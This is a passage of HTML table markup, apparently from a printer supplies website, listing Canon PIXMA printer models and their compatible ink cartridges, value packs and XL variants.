<td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-750 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-750XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PGI-755XXL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n      <td>CL-746 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746S (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-746XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-745 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745S (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-745XL (Pigment Black)</td>\n    </tr>\n    </tbody>\n  </table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td 